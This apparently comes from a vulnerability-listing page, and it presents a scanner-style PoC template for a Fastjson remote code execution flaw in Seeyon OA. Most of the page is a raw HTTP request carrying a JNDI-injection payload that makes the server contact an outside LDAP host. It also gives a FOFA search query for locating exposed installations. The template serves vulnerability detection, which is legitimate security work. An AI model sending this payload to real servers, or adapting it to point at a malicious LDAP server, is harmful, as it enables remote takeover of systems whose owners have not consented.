seeyon-oa-fastjson-rce: Seeyon OA Fastjson Remote Code Execution

日期: 2025-08-01 | 影响软件: Seeyon OA Fastjson | POC: 已公开

漏洞描述

Seeyon OA Fastjson is vulnerable to RCE.

PoC代码[已公开]

id: seeyon-oa-fastjson-rce

info:
  name: Seeyon OA Fastjson Remote Code Execution
  author: SleepingBag945
  severity: critical
  description: Seeyon OA Fastjson is vulnerable to RCE.
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
    - https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="致远互联-OA"
  tags: seeyon,oa,rce,fastjson,oast,vuln

http:
  - raw:
      - |
        POST /seeyon/main.do?method=changeLocale HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "com.alibaba.fastjson.JSONException"
# digest: 490a00463044022000811f65c0017123b4791dc84fee678c4731e8f16c72744e82dbccffd7f22eaa0220442162d84b4c57aceacd6368e9c545b94c2ae9369c3d104735fa9b8c14848776:922c64590222798bb761d5b6d8e72950